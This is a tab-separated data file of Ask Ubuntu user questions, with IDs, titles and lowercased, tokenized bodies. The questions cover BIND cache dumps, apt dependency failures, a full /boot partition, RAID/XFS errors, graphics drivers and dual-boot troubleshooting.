283190	dump cache of bind dns	when i do rndc dumpdb then this file has no new cache dumped ( 18.04 was yesterday , i do n't know how i did this dump ) and looks like : > ; ; start view _default ; ; ; cache dump of view '_default ' ( cache > _default ) ; $ date 20130418231828 ; ; address database dump ; ; ; unassociated entries ; ; ; bad cache ; ; ; start view _bind ; ; ; > cache dump of view '_bind ' ( cache _bind ) ; $ date 20130418231828 ; ; > address database dump ; ; ; unassociated entries ; ; ; bad cache ; ; > dump complete am i right to expect there list of domains beind cached ? when i did : rndc dumpdb > > dump.txt empty file has been created . i see that cache is working because after first search of domain , i.e . dig www.boost.org next lookup for same domain is made immediately , so it is caching . but where is cache stored or more specific , why there is nothing in dump file and only `` bad cache '' info . i have compiled bind9 from source , then created dir var/named and file there like root_hints , folder pz , and named.conf in /etc/ . configuration seems working ok since server is started without any errors . here is info from named.run in var/named , when i tried dump : 19-apr-2013 15:21:48.438 received control channel command 'null' 19-apr-2013 15:21:48.438 received control channel command 'dumpdb' 19-apr-2013 15:21:48.438 dumpdb started 19-apr-2013 15:21:48.491 dumpdb complete
283191	installation error media is either dirty or damaged	there is an installation error which states that there is an issue with the installation media ( in this case a cd-rom ) . thanks for your time.. installing on a sony vaio machine any recommendations ? ?
283196	persistent device naming for windows 7-partition in ubuntu	i 'd like to give the windows partition of my ubuntu installation a persistent device name , so different applications ( like the local folder-account of my email software , or my local dropbox client ) have access to folders and files on this partition via a fixed file path . as far as i understand ( i am a linux newbie ) , the easiest way to do this will be to create personal udev-rules . i tried to follow several guides like this one , but these seem specifically written for usb devices . if i follow their steps and type udevadm info -a -p $ ( udevadm info -q path -n /dev/sd2 ) ( sd2 is my windows partition ) , i get , for instance , no bus-value and no sysfs { product } -value either , although both seem to be necessary for writing rules . maybe newer ubuntu versions even have a far more easier way to accomplish this task ? many thanks in advance for your help !
283199	ubuntu 12.10 wo n't load , stays at purple screen	i 'm new to ubuntu and have been using for a couple of weeks now with no problems but now it suddenly wo n't boot up and freezes like 30 seconds after i pick `` ubuntu '' on the boot menu ( i hear the disk working for around 20 to 30 seconds and then it stops and nothing happens ) . yesterday it worked perfectly and i did n't ( voluntarily at least ) changed any system setting . the only system level change was that i just went ahead when it asked my to install a couple of updates . i would like to know where i can find what the cause is ( logfile or anything ) or how to begin diagnosing something like this . i 'm pretty beginner at linux so i 'm totally lost right now . i 've tried recovery mode with `` safe video '' ( or something like that ) and it wo n't load either . even though i have an ati hd 7770 i do n't think it 's video related because i installed the amd driver on day one and it have been working flawlessly for a couple of weeks with it . any guidance will be appreciated . thanks !
283200	lsb_release does n't match settings > details	i have a dell xps 13 , that came with ubuntu installed the oem way by dell . it came with 12.04 , and i have since upgraded to 12.10 , but now the output of lsb_release -a does n't match the information shown in settings > details ( or gear icon > `` about this computer '' ) . lsb version : core-2.0-amd64 : core-2.0-noarch : core-3.0-amd64 : core-3.0-noarch : core-3.1-amd64 : core-3.1-noarch : core-3.2-amd64 : core-3.2-noarch : core-4.0-amd64 : core-4.0-noarch distributor id : ubuntu description : ubuntu 12.10 release : 12.10 codename : quantal should i file a bug ? i would complain to dell , but this should n't be their problem .
283202	does gwibber/uoa auto-follow people on twitter without my permission ?	each day i gain new twitter followers whom i do n't want to follow . i have to unfollow them manually . i have checked my twitter authorized apps section . only two of them have permission . gwibber ( ubuntu ) & twitter for android ( official twitter client ) . i asked twitter about their official client . they replied `` our official android client does n't auto-follow people . third party apps do that . '' when i authorize gwibber the permission page says that it can follow people new people ( when i explicitly click follow ? ) . but can it do that automatically even without my permission ? i am using ubunutu 12.10 .
283205	can not get opengl to install	when i try to run an example application it says i am missing a file that is found in opengl . i found information online and tried to install opengl with the following command : sudo apt-get install libglu1-mesa-dev freeglut3-dev mesa-common-dev reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies . freeglut3-dev : depends : libgl1-mesa-dev but it is not going to be installed or libgl-dev depends : libxt-dev but it is not going to be installed depends : libxext-dev but it is not going to be installed libglu1-mesa-dev : depends : libglu1-mesa ( = 8.0.2-0ubuntu3 ) but 8.0.4-0ubuntu0.4 is to be installed depends : libgl1-mesa-dev but it is not going to be installed or libgl-dev mesa-common-dev : depends : libx11-dev but it is not going to be installed depends : libdrm-dev but it is not going to be installed e : unable to correct problems , you have held broken packages . how do i fix this ?
283207	what to do about errors with update & upgrade ?	i 'm using ubuntu 12.04 lts 64 bit on a pacard bell dot s netbook with intel atom 64 bit processor . i get then following message when using either apt-get update or upgrade . upgrade stops on this but update carries out the updates then reports the error w : duplicate sources.list entry http : //archive.canonical.com/ubuntu/ precise/partner amd64 packages ( /var/lib/apt/lists/archive.canonical.com_ubuntu_dists_precise_partner_binary-amd64_packages ) w : duplicate sources.list entry http : //archive.canonical.com/ubuntu/ precise/partner i386 packages ( /var/lib/apt/lists/archive.canonical.com_ubuntu_dists_precise_partner_binary-i386_packages ) w : you may want to run apt-get update to correct these problems if i remove the files when i run upgrade or update they recur .
283210	problem while installing any new software	i have recently install ubuntu in my desktop . when i am trying to install new software from software center it 's showing some missing package problem . what should i do ? can any one help me ? this is the massage showing when i am installing any new software : '' this error could be caused by required additional software packages which are missing or not installable . furthermore there could be a conflict between software packages which are not allowed to be installed at the same time . ''
283212	what to do when my system freezes ?	ubuntu has suddenly stopped working and everything has become unresponsive , including the mouse , keyboard . i waited for almost an hour to make it settle itself . finally , i had to shut it down and restart it and then it was ok. details : when this happened , i opened almost 9 tabs ( i do n't know whether this can cause a crash in ubuntu ) . i have ubuntu installed in windows 8 using wubi . i never had this problem before . i use 12.04 lts . what might be the possible reason for this ? is this due to some mis-management of system ? or something else ? system specifications : brand : samsung model : samsung np 300 e5c a02in architecture : 64 bit graphic card : intel 4000 hd graphic card i do n't remember installing any custom drivers manually memory given to ubuntu partition : 30 gb ( i am using far below this ) processor : 3rd gen i5 .
283215	enable desktop wallpaper change with elapsed time	is there a way to randomise the ubuntu desktop wallpaper with time for each displayed wallpaper . this will randomly select a wallpaper from the pictures folder and display it for the specified time allocated to it in a slideshow .
283217	how do i calculate the size of folders which contains some unreadable contents ?	the /var/lib contains some unreadable contents , one of which is the mysql folder . i wanted to see the size of the /var/lib folder and the mysql folder in particular . right-clicking on it and clicking on the `` properties '' option gives me this : in case you need the specs : ubuntu 12.10 nautilus 3.4.2 edit : `du -sh /var/lib` gives me this : du : can not read directory `/var/lib/sudo ' : permission denied du : can not read directory `/var/lib/tor ' : permission denied du : can not read directory `/var/lib/udisks2 ' : permission denied du : can not read directory `/var/lib/php5 ' : permission denied du : can not read directory `/var/lib/openfire ' : permission denied du : can not read directory `/var/lib/gdm ' : permission denied du : can not read directory `/var/lib/lightdm ' : permission denied du : can not read directory `/var/lib/polkit-1 ' : permission denied du : can not read directory `/var/lib/mysql ' : permission denied du : can not read directory `/var/lib/libvirt/qemu ' : permission denied du : can not read directory `/var/lib/libvirt/sanlock ' : permission denied du : can not read directory `/var/lib/libvirt/images ' : permission denied du : can not read directory `/var/lib/libvirt/boot ' : permission denied 266m /var/lib and sudo du -sh /var/lib gives this : 309m /var/lib
283224	samsung smart tv cant connect through hdmi	in the `` sources '' menu it displays as connected , but a box pops up and says : no signal , check cable connection and settings on connected device my pc running ubuntu 12.10 is set to mirror displays when i connect to it .
283232	how to run audio settings program without unity ?	in unity desktop , there is a sound menu at the top of the screen where i can change volume and input/output devices ( screenshot ) . i 'm wondering how can i run this program without unity ? ( just in case , i know about alsamixer , but it 's not what i 'm looking for . )
283233	how to get kernel versions to match in a server and clients ?	ubuntu has released 12.04.2 lts , which has a newer kernel than the one that comes with 12.04.1 lts . i prefer to keep server and clients with the same kernel version . can this be done ?
283237	raid array : can not access files on one partition , getting input/output error	i 'm hitting an access error with part of a raid array and need help in troubleshooting this . history : several raid partitions live on 4 disks . four days ago some ticking noises were heard from the workstation , and the gui ubuntu disk utility showed some bad sectors , but things were otherwise green . yesterday ( thurs , april 17 ) we got hit with a power failure and a hard reboot . following the hard reboot the system comes up and mounts most of the raid partitions , but one large critical one ( containing /home ) is throwing input/output errors . bpbrown @ eguzki : / $ ls home ls : can not access home : input/output error bpbrown @ eguzki : / $ we 're in ubuntu 12.04 , and owing to the loss of /home , we 're at command line only . on reboot , mdadm showed that the array was resyncing ; that seems to have completed but still no luck in accessing /home . here are the results of mdadm : bpbrown @ eguzki : / $ sudo mdadm -d /dev/md10 /dev/md10 : version : 0.90 creation time : thu feb 4 16:49:43 2010 raid level : raid5 array size : 2868879360 ( 2735.98 gib 2937.73 gb ) used dev size : 956293120 ( 911.99 gib 979.24 gb ) raid devices : 4 total devices : 4 preferred minor : 10 persistence : superblock is persistent update time : fri apr 19 10:03:46 2013 state : clean active devices : 4 working devices : 4 failed devices : 0 spare devices : 0 layout : left-symmetric chunk size : 64k uuid : 317df11d:4e2edc70 : fa3efedc:498284d3 events : 0.2121101 number major minor raiddevice state 0 8 10 0 active sync /dev/sda10 1 8 26 1 active sync /dev/sdb10 2 8 42 2 active sync /dev/sdc10 3 8 58 3 active sync /dev/sdd10 bpbrown @ eguzki : / $ and here 's mdstat : bpbrown @ eguzki : / $ cat /proc/mdstat personalities : [ raid1 ] [ raid6 ] [ raid5 ] [ raid4 ] [ linear ] [ multipath ] [ raid0 ] [ raid10 ] md1 : active raid1 sda1 [ 0 ] sdb1 [ 1 ] sdc1 [ 2 ] sdd1 [ 3 ] 497856 blocks [ 4/4 ] [ uuuu ] md8 : active raid5 sda8 [ 0 ] sdb8 [ 1 ] sdc8 [ 2 ] sdd8 [ 3 ] 5301120 blocks level 5 , 64k chunk , algorithm 2 [ 4/4 ] [ uuuu ] md6 : active raid5 sda6 [ 0 ] sdb6 [ 1 ] sdc6 [ 2 ] sdd6 [ 3 ] 20530752 blocks level 5 , 64k chunk , algorithm 2 [ 4/4 ] [ uuuu ] md7 : active raid5 sda7 [ 0 ] sdc7 [ 2 ] sdd7 [ 3 ] sdb7 [ 1 ] 5301120 blocks level 5 , 64k chunk , algorithm 2 [ 4/4 ] [ uuuu ] md5 : active raid5 sda5 [ 0 ] sdd5 [ 3 ] sdc5 [ 2 ] sdb5 [ 1 ] 5301120 blocks level 5 , 64k chunk , algorithm 2 [ 4/4 ] [ uuuu ] md10 : active raid5 sda10 [ 0 ] sdc10 [ 2 ] sdd10 [ 3 ] sdb10 [ 1 ] 2868879360 blocks level 5 , 64k chunk , algorithm 2 [ 4/4 ] [ uuuu ] unused devices : < none > bpbrown @ eguzki : / $ unmounting and remounting /dev/md10 does n't seem to help , though i may well have missed a step in correctly mounting the raid array . if helpful , here 's the contents of /etc/fstab : bpbrown @ eguzki : / $ more /etc/fstab # /etc/fstab : static file system information . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc defaults 0 0 /dev/md5 / reiserfs relatime 0 1 /dev/md1 /boot reiserfs notail , relatime 0 2 /dev/md10 /home xfs relatime 0 2 /dev/md8 /tmp reiserfs relatime 0 2 /dev/md6 /usr reiserfs relatime 0 2 /dev/md7 /var reiserfs relatime 0 2 /dev/sda9 none swap pri=1 0 0 /dev/sdb9 none swap pri=1 0 0 /dev/sdc9 none swap pri=1 0 0 /dev/sdd9 none swap pri=1 0 0 /dev/scd0 /media/cdrom0 udf , iso9660 user , noauto , exec , utf8 0 0 bpbrown @ eguzki : / $ update april 23 : tried mounting the filesystem directly again and got a possibly useful error message . here 's a short version , omitting some of the call trace : bpbrown @ eguzki : / $ dmesg | tail [ 788.335968 ] xfs ( md10 ) : mounting filesystem [ 788.516845 ] xfs ( md10 ) : starting recovery ( logdev : internal ) [ 790.082900 ] xfs : internal error xfs_want_corrupted_goto at line 1503 of file /build/buildd/linux-3.2.0/fs/xfs/xfs_alloc.c . caller 0xffffffffa0226837 [ 790.082905 ] [ 790.083004 ] pid : 3211 , comm : mount tainted : p o 3.2.0-38-generic # 61-ubuntu [ 790.083010 ] call trace : < omitted for brevity > [ 790.084139 ] xfs ( md10 ) : xfs_do_force_shutdown ( 0x8 ) called from line 3729 of file /build/buildd/linux-3.2.0/fs/xfs/xfs_bmap.c . return address = 0xffffffffa0236e52 [ 790.217602 ] xfs ( md10 ) : corruption of in-memory data detected . shutting down filesystem [ 790.217654 ] xfs ( md10 ) : please umount the filesystem and rectify the problem ( s ) [ 790.217761 ] xfs ( md10 ) : xfs_imap_to_bp : xfs_trans_read_buf ( ) returned error 5 . [ 790.217775 ] xfs ( md10 ) : xlog_recover_clear_agi_bucket : failed to clear agi 5 . continuing . < last 2 lines repeat 8 times > [ 790.388209 ] xfs ( md10 ) : ending recovery ( logdev : internal ) bpbrown @ eguzki : / $ thank you in advance for any suggestions on how to proceed , -- ben
283244	apt-get upgrade failing due to dependency issue	i am running 12.04 lts on a asus custom build server . i apologize in advance as my skills are a bit rusty in linux as i spend more time working with networking gear these days . i am running sudo apt-get upgrade after i ran sudo apt-get update and i get the follwoing : reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : linux-image-server : depends : linux-image-3.2.0-39-generic but it is not installed linux-server : depends : linux-headers-server ( = 3.2.0.39.47 ) but 3.2.0.40.48 is installed e : unmet dependencies . try using -f. so when i run sudo apt-get -f install i get the following : reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following package was automatically installed and is no longer required : linux-image-3.2.0-37-generic use 'apt-get autoremove ' to remove them . the following extra packages will be installed : linux-image-3.2.0-40-generic linux-image-server linux-server suggested packages : fdutils linux-doc-3.2.0 linux-source-3.2.0 linux-tools the following new packages will be installed : linux-image-3.2.0-40-generic the following packages will be upgraded : linux-image-server linux-server 2 upgraded , 1 newly installed , 0 to remove and 124 not upgraded . 3 not fully installed or removed . need to get 0 b/38.6 mb of archives . after this operation , 150 mb of additional disk space will be used . do you want to continue [ y/n ] ? y ( reading database ... 373700 files and directories currently installed . ) unpacking linux-image-3.2.0-40-generic ( from ... /linux-image-3.2.0-40-generic_3.2.0-40.64_amd64.deb ) ... done . dpkg : error processing /var/cache/apt/archives/linux-image-3.2.0-40-generic_3.2.0-40.64_amd64.deb ( -- unpack ) : failed in write on buffer copy for backend dpkg-deb during ./boot/abi-3.2.0-40-generic ' : no space left on device no apport report written because the error message indicates a disk full error dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.2.0-40-generic /boot/vmlinuz-3.2.0-40-generic run-parts : executing /etc/kernel/postrm.d/zz-update-grub 3.2.0-40-generic /boot/vmlinuz-3.2.0-40-generic errors were encountered while processing : /var/cache/apt/archives/linux-image-3.2.0-40-generic_3.2.0-40.64_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) ` as you can see there is a disk full error message so i tried to purge some of the unused kernels following a process posted on another question i found . i ran sudo apt-get purge linux-image-x.x.x.x-generic where x.x.x.x is a kernal version i was not using but i get the same error of suggesting to run apt-get -f install i got when i ran sudo apt-get upgrade . is there something i am just not remembering to help me clear space up here or another way to purge unneeded kernel images ? an attempt to run sudo dpkg -- configure -a results : setting up initramfs-tools ( 0.99ubuntu13.1 ) ... update-initramfs : deferring update ( trigger activated ) dpkg : dependency problems prevent configuration of linux-image-server : linux-image-server depends on linux-image-3.2.0-39-generic ; however : package linux-image-3.2.0-39-generic is not installed . dpkg : error processing linux-image-server ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of linux-server : linux-server depends on linux-image-server ( = 3.2.0.39.47 ) ; however : package linux-image-server is not configured yet . linux-server depends on linux-headers-server ( = 3.2.0.39.47 ) ; however : version of linux-headers-server on system is 3.2.0.40.48. dpkg : error processing linux-server ( -- configure ) : dependency problems - leaving unconfigured processing triggers for initramfs-tools ... update-initramfs : generating /boot/initrd.img-3.2.0-38-generic gzip : stdout : no space left on device e : mkinitramfs failure cpio 141 gzip 1 update-initramfs : failed for /boot/initrd.img-3.2.0-38-generic with 1. dpkg : error processing initramfs-tools ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : linux-image-server linux-server initramfs-tools results of df -h. could n't remember that command for the life of me to see the space . get a good laugh at the boot size especially since it is on that 500gb drive with not much being used there . i ca n't steal from /dev/sdb1 as that is isolated physical drive for share space among all users and can be taken out and moved to any system easily should the need arise . filesystem size used avail use % mounted on /dev/mapper/nas-root 455g 11g 421g 3 % / udev 2.0g 4.0k 2.0g 1 % /dev tmpfs 791m 768k 790m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 2.0g 0 2.0g 0 % /run/shm /dev/sdb1 1.8t 929g 813g 54 % /media/windows /dev/sda1 228m 228m 0 100 % /boot ca n't remember when i built this server but it will be the last time i let it select sizes for partitions automatically . i am guessing my best bet is to follow these instructions for increasing partition size ? http : //ubuntuforums.org/showthread.php ? t=1219270 any worries with data corruption by stealing from /dev/mapper/nas-root ? well i finally cleared space up correctly but i am still getting a dependency issue when trying to run sudo apt-get -f install . reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : linux-image-server linux-server the following packages will be upgraded : linux-image-server linux-server 2 upgraded , 0 newly installed , 0 to remove and 124 not upgraded . 2 not fully installed or removed . need to get 0 b/4,320 b of archives . after this operation , 2,048 b of additional disk space will be used . do you want to continue [ y/n ] ? y dpkg : dependency problems prevent configuration of linux-image-server : linux-image-server depends on linux-image-3.2.0-39-generic ; however : package linux-image-3.2.0-39-generic is not installed . dpkg : error processing linux-image-server ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of linux-server : linux-server depends on linux-image-server ( = 3.2.0.39.47 ) ; however : package linux-image-server is not configured yet . linux-server depends on linux-headers-server ( = 3.2.0.39.47 ) ; however : version of linux-headers-server on system is 3.2.0.40.48. dpkg : error processing linux-server ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already errors were encountered while processing : linux-image-server linux-server e : sub-process /usr/bin/dpkg returned an error code ( 1 ) not sure how to even begin to fix this issue since there is a newer version of the kernal file there but it is looking for an older version .
283246	only `` vulnerable '' flash player version works	for the last year , i have been using outdated shockwave flash 11.1 r102 in firefox , because more recent versions ( 11.2 r202.243 or .280 ) do n't work for me . typically , with r202 versions , i get blanks instead of streetview images & youtube videos . chromium seems to use whatever flash player i install in ff and its behavior follows ff . recently , i started to get awful red warnings about r102 being `` vulnerable '' ( which i believe , of course ) & it is disabled & i have to activate it manually every time i want to use it on the above sites . so in the last few days , i have tried r202 versions again , but they still do n't work . i am currently using lubuntu 12.10 with ff20.0 , but i have the same behavior with the same versions of flashplayer in ubuntu 10.04 . can i expect any versions to work `` normally '' in ubuntu ?
283247	how to get around graphical issue when `` waking '' computer from suspend ?	i 've checked a few of the similar questions . but they have provided no viable answer . i would rather not install nvidia drivers . because i 've had nothing but trouble with them . but to the problem . when i wake the computer up from suspend mode , there are lots of coloured lines and lots of differently colour pixels everywhere on the screen . it 's rather disjointing to see your computer in that state when you 're not expecting it ! so , is there a fix for this that does not require me install nvidia drivers ?
283252	how do i overcome the problem with opera i have screenshot in the body ?	the problem is that i ca n't see a thing when i try to edit preferences because of the following screen : click on the image to open a full resolution version . i am running 32 bit 12.10 and using opera 12.15 . what i have tried under others advice : i have tried changing the theme but this failed ( both to the default and to another custom theme too ) . i have also tried opening up a terminal window in front of opera with preferences opened and this failed too .
283256	getting star wars - rogue squadron working on linux	i 've tried using mupen64plus and project64 2.0 under wine , but both have failed to run correctly . the video is completely blank , although the audio seems to run fine . even when i fullscreen the project64 window , it still remains blank , only changing colour from black to white . i 've tried various video plugins , including arachnoid , z64 , rice , glide64 , etc . rice comes the closest , by showing small parts of the screen , with the rest being totally blank . glide64 outputs an error message : video : ucode = -1 video error : error : unsupported ucode ! crc : 86b1593e i 've also tried the different available varieties of the game , the usa and european versions , but to no avail . not sure where to go from there . edit : i 'm using nvidia proprietary drivers and have had no problem running other games in both mupen64plus and project64 2.0 .
283257	how do i enable cookies in opera ?	in order to access some privileges as far as accessing journal articles and other resources that my university allows me i need cookies enabled . i have tried what i can to enable them like going to the opera - > settings - > quick preferences - > enable cookies ( and clicking this ) but this does n't seem to do a thing .
283258	steam bug on xubuntu 12.10	i installed steam on xubuntu but interface appear white like this : any suggestion ?
283261	how to check if my graphic card is muxless ?	how can i check whether my graphic card is `` muxed '' or `` muxless '' ? my graphic card is an amd hd 8730m , and on my dell inspiron 15r 5521 i 've also got an intel hd 4000 . but when i use the lspci command i only get this output for vga : vga compatible controller : intel corporation 3rd gen core processor graphics controller vga compatible controller : advanced micro devices [ amd ] nee ati device 6601 and nothing else . my dell laptop is overheating and i want to solve the problem . i already installed and configured the i8kmon utility , but that 's not the way to solve the overheating problem at its root . so i need to check if my amd hd 8730m card is muxless , otherwise i wo n't know if i can follow this guide : amd/intel hybrid graphics works
283262	ubuntu gnome 3 and windwos fail boot	i have a strange issue : i wanted to install ubuntu 12.10 gnome edition on a usb and every time i wanted to use this ubuntu to plug my usb into my laptop and boot the usb enjoy the cool os . i made a usb with the distro and 10gb of perserve space . plug , boot , on the install screen format and install . gnome started everything is ok. after that i wanted to log on my main os that is win7 . shutdown the whole laptop . unplug the usb and start the computer . but it booted automatically ( without asking me and i dont know how when the usb is not connected ) ubuntu gnome3 ... i 'm starting to think that i made the huge mistake to format my whole harddrive and not to use the usb as a portable os : x i 'm very new to this community and to ubuntu/linux = noob , so i will appriciate friendly comments and not too much linux jargon ( terminologie ) . first thing is how can i see my whole hard disk and all installed os ? second is there a way to revert the process : d ? third ... i think that whatever happens i will try this ( the portable ubuntu os ) one more time so maybe i need a complete/newb guide for someone like me . fourth.. i dont know yet but i 'm sure that there are more questions that are waiting to be invoked . : d thanks !
283263	display application icon in the title bar	in unity 's default configuration the title bar looks like this : i 'd like to achieve this : is it possible to show the icon of the application in the title bar ?
283267	simple architectural software for ubuntu	i have tried to find a simple architectural software for ubuntu . i need something that can draw walls in different materials that has fixtures that can be dropped in to the drawing . a friend lent me home designer by chief architect . it only works on windows . is there a similar , easy to use program for ubuntu ? ?
283276	how can i replicate putty 's capabilities in gnome-terminal ?	i connect to my workplace via citrix . now to connect to servers , i currently use putty . this is because in putty , i can use the proxy settings options to add connect via http proxy which is set to 127.0.0.1:3218 . how can i achieve the same from a gnome terminal without affecting the whole system 's configuration ? i have tried connect-proxy -h 127.0.0.1:3218 server-name 22 . but this gives an error fatal : failed to begin relaying via http .
283282	will ubuntu run on an amd 6 core processor and ati graphics card ?	i 'm building a computer with amd 6 core process and its respective motherboard takes ati or nvidia as graphic cards , ram 32gb , hdd 2x3tb , usb2.0/3.0 ports . i want to know if i 'm correct by saying that ubuntu will have not problem running by using the processor , ram , motherboard , hdds ? my other concern is the graphic card , i 'm planning to set my computer with three monitors and my 60 '' tv , so what video card you guys recommend for this purpose . if you have advises in how to build a computer for ubuntu also comment . amd fx-6300 fx-series six-core processor black edition g.skill ripjaws x series 32gb ( 4 x 8gb ) 240-pin sdram ddr3 1600 ( pc3 12800 ) asus ddr3 1800 am3 motherboards sabertooth 990fx/gen3 r2.0 geforce gtx 670 as my graphic card
283285	how can i add 'emacs ' to one of the 'show other application ' in file explorer	in file explorer ( nautilus ) under ubuntu , i can select a file and right click and scroll to : open with other application my question is how can i add emacs to that list of `` other application ''
283293	bad resolution through kvm switch	i added a kvm switch to my setup so i can switch between a windows laptop and an ubuntu 12.10 desktop . i 'm getting a bad resolution through lightdm . the display is huge and i can see that most of it goes off screen so i ca n't see it . my mouse and keyboard do n't work either but that 's another problem . anyhow , i tried modifying /etc/lightdm/lightdm.conf and added the line display-setup-script=xrandr -- output default -- mode 1920x1080 from a different post in hopes that on reboot the problem would get resolved . it did n't make a difference through . i also tried the instructions by ghodmode at kvm switch and screen resolution problem and unfortunately this did n't work either . the way i 'm making changes to config files now is via remote desktop into the ubuntu machine . one other question - since i 'm a noob i do n't understand how these pieces all fit together . lightdm is a display manager , is that the same as x ? would making changes to xorg.conf help here ? thanks , mj
283297	where are installed the binaries of texlive ?	after installing texlive 2012 trought the texlive-backports ppa on ubuntu 12.04 , i can not find it in /usr/local/ . why ? i need to find the path to the binaries so i can add that to texstudio .
283300	how to enable unity 3d in 12.04 ?	i installed the graphic card driver : but unity is still in 2d mode : how can i bring it into 3d mode ?
283304	i/o errors when trying to copy data off a drive	i 'm trying to copy data off of an old sata drive that ran ubuntu but it erroring out saying input/output error . what would cause that error and how can i fix it ?
283305	administrator access	how do i know that i have administrator 's access on ubuntu 12.04 and how do i stop the incessant prompts that always need my authorization to be able to do anything ?
283306	username modification while retaining data structure	i 've tried this in the past with zero success . how do i change the /home/user directory for a user , when i change their username , and how do i update their username without causing massive breakage ?
283308	ubuntu : escape or exit superuser mode	i have ubuntu 12 and my power went out so when i restarted the computer , it immediately booted up to super user/ console mode . i did some google search on forums and such on similar issues , but i 'm not sure what this problem is even called . i can type in my user name and password but even when i type in startx or exit , i ca n't get to the deskptop . any suggestions would be helpful on how to escape this , and prevent this from happening in the future every time i do n't shut down properly . thanks in advance .
283311	how to setup a radeon 4000+ ?	i am really adamant to get linux running all my games , and i want to make the move to ubuntu . however , due to the lack of driver support for both sound and graphics cards , i am stuck with windows ... . : ( i 've tried to use the drivers provided here : http : //support.amd.com/us/gpudownload/linux/legacy/pages/legacy-radeon_linux.aspx when i run it from root ./amd-driver-installer-catalyst-13.1-legacy-linux-x86.x86_64.run the driver does not install . and there is no update on my system info ; saying that the driver was registered successfully . if anyone here has actually done this on a 4000 series card , can you explain your step by step procedures . or would it be fair to say that linux is still not ready for gamers ? thanks for any help anyone can give .
283323	dual monitor not working when 'nomodeset ' is used	i am using an hp pavillion g6 laptop running 12.04 , and the laptop screen is simply black if i do n't apply 'nomodeset ' on startup . however , including this has lead to the laptop not recognising an external monitor . i have searched around online and this seems to be a problem that a number of people with this laptop have experienced , but so far i have n't seen a solution , any help would be greatly appreciated ! thanks .
283326	my screen is shown after ubuntu is waken up	when i wake up suspend or hibernate , my screen is shown for a moment . how can i block it ?
283328	how do i use another hard drive ? and dual boot	i have ubuntu 12.04 installed and updated on my external hard drive , and i want to be able to access my internal hard drives via ubuntu . one of the internal hard drives has windows 7 on it and the other is a 1 tb hard drive for my main storage . i ca n't figure out how to access my other hard drives while in ubuntu . also , is there anyway to make it so that if i do n't have my external plugged in it boots straight into windows 7 but if i plug it in it gives me a boot option to go between both without having to click f11 to go into boot menu ? thanks for the help ! : )
283337	what does idle time output from `` w '' command tell ?	i want to know if can safely shutdown my computer at home , by testing to see if my flatmate is using it . therefore i use the command `` w '' in terminal . however the idle time for tty seems strange ( note i do n't know much about linux or what tty means ) . for example , a test of `` w '' command on my work machine shows that the idle time of my session is 14days ? but i am using it now ... this is something i do n't understand . w user tty from login @ idle jcpu pcpu what me tty7 :0 09apr13 14days 1:41m 3.07s gnome-session -- session=ubuntu
283345	how to install drivers for amd radeon hd 7850 ?	could someone help me to install drivers for amd radeon hd 7850 graphic card ?
283354	can you install ubuntu on xps 18	dell has a new 18 '' tablet . can you install ubuntu and if so does it support all of the necessary elements like touch ?
283355	backed up an image of my hd using ddrescue want to mount ( not virtually ) on new hd	background : hard drive on vista laptop developed fault but still works and boots . all important user data recovered and new hd purchased . do n't want to go through hassle of re-installing/ re-configuring/ downloading all the software so googled and decided to create an .img file usind ddrescue . so far so good . now all i want to do is to transfer it to the new drive and `` mount '' that drive so that windows can boot directly from it . ive looked at countless threads but nothing seems ( or seems to me ) to do what i need . they all seem to focus on recovering just specific data or are linux specific . i looked up the ntfs configuration tool and have tried to understand the sudo syntax but do n't want to get it wrong . i 've found a windows tool that sort of does it but again just to get at the data contained within the image . i sure it is simple and would really appreciate a simple command string to use in parted magic or something similar . many thanks in anticipation .
283362	purple screen after installing to external hard drive	i have windows 7 64 on my laptop ( msi gx660 ) . i downloaded the 64 bit ubuntu 12.10 install onto a 1gb usb drive , rebooted , and installed onto a 1tb usb external hdd . i followed this guide i then set the boot priority in the bios to the external . once it gets to the purple menu where i can choose `` ubuntu '' , i do and it goes to a purple screen and stays there . choosing ubuntu recovery gives the same result . i 've tried typing `` e '' to edit and changing certain lines to `` nomodeset '' and others , does n't work .
283367	libreoffice 3.4.4 wo n't update	i have ubuntu 11.10 installed on my machine and libreoffice 3.4.4 came with it . since i know there is a newer version out there , i ran the following commands : sudo add-apt-repository ppa : libreoffice/ppa sudo apt-get update sudo apt-get upgrade however it wo n't install a newer version and i 'm stuck with 3.4.4 ( a version i 'm not completely a fan of ) . any ideas ?
283368	from quickly.widgets import url_fetch_progressbar can not be found ?	at the moment im creating a web browser using a mix of python and quickly ( glade ) im trying to get the progress bar at the bottom of the page to work properly ( with no luck atm ) i have inserted this bit of code : from quickly.widgets import url_fetch_progressbar to my main area ( dmwebbrowserwindow.py ) when i run the package through command promt ( quickly run ) i get an error message like this : traceback ( most recent call last ) : file `` bin/dm-web-browser '' , line 32 , in < module > import dm_web_browser file `` /home/matty/dm-web-browser/dm_web_browser/__init__.py '' , line 14 , in < module > from dm_web_browser import dmwebbrowserwindow file `` /home/matty/dm-web-browser/dm_web_browser/dmwebbrowserwindow.py '' , line 19 , in < module > from quickly.widgets import url_fetch_progressbar importerror : no module named widgets any ideas how i fix this ? ( before i decide to give in and throw the laptop out the window )
283369	how to switch from ubuntu to windows 7 ?	i have windows 7 installed on c drive and installed ubuntu on d drive . when i start the laptop , it starts with ubuntu . i want to switch back to windows 7 . i do n't want to lose any data on windows 7 . how can i uninstall ubuntu using ubuntu itself ? i 'm running ubuntu 12.10 64bit .
